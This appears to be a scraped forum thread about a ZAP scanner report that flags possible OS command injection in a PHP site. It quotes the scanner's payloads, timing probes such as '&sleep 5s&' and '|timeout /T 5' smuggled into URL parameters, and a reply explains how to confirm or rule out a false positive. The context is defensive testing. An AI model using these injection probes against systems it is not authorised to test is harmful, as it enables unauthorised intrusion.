Dinesh Rawat February 2016

zaproxy scan report solution in PHP

I am using zaproxy for automatic testing of my site. There is a P1 alert in the scan report. I dont know how to rectify this err. Can someone please help me out:-

https://example.com/index.php?id=1535&source=home&storyId=468&r=video%2Fview%22%26timeout+%2FT+5%26%22&mode=current

    Parameter

r

    Attack

video/view"&timeout /T 5&"

Answers


Dinesh Rawat February 2016

Alert Detail

High (Medium) Remote OS Command Injection Description

Attack technique used for unauthorized execution of operating system commands. This attack is possible when an application accepts untrusted input to build operating system commands in an insecure manner involving improper data sanitization, and/or improper calling of external programs.

URL

https://example.com/index.php?id=1535&source=home&storyId=468&r=video%2Fview%22%26timeout+%2FT+5%26%22&mode=current

Parameter

r

Attack

video/view"&timeout /T 5&"

URL

https://example.com/index.php?id=1535&source=home&storyId=468&r=video%2Fview&mode=current%22%7Ctimeout+%2FT+5

Parameter

mode

Attack

current"|timeout /T 5

URL

https://example.com/index.php?r=site/login

Parameter

userTimeZone

Attack

&sleep 5s&

URL

https://example.com/js/tinymce/tinymce.min.js?version=1405493567%26sleep+%7B0%7Ds%26

Parameter

version

Attack

1405493567&sleep {0}s&

URL

https://example.com/themes/sharperax/css/sh


Psiinon February 2016

OK, so this is a timing attack. These are prone to false positives if the server is under load.

You should always try to manually validate any potential vulnerability reported by a scanning tool, including ZAP.

In this case open the URLs referenced in your browser - did it take around 5 seconds to load? Then change the '5' on the URL to something much larger, eg '30' - did it now take 30 seconds?

If took around the same length of time then this is likely to be a false positive.

Post Status

Asked in February 2016
Viewed 3,327 times
Voted 12
Answered 2 times

Search




Leave an answer